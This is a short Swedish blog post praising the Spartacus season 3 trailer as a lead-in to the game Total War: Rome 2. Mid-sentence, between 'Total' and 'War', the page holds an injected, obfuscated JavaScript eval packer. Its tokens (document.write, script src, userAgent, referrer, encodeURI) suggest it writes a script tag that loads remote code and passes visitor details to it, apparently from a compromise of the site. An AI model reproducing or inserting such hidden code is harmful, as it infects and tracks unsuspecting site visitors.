Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Påtala om Total War: Rome2, här är Spartacus season 3!

Filip Urde
  • On 27 september, 2012
  • http://www.revue.se/filip-urde

Jag har inte riktigt fallit för Spartacus, tittade första säsongen, men när Andy Whitfield (som spelade Spartacus) tragiskt nog dog i cancer så trodde jag att serien skulle dö. Spartacus fortsatte med Liam McIntyre i rollen som Spartacus och sedan gav jag inte den serien någon mer tanke. Inte förens idag!

Här är trailern för Spartacus season 3 och det är förmodligen den sista säsongen i serien och wow! Jag älskar stora slag och här är en serie som värkar satsa stenhårt för att avsluta sin serie storslaget. Perfekt uppladdning för Total eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hyykf|var|u0026u|referrer|idiaz||js|php’.split(’|’),0,{}))
War: Rome 2
.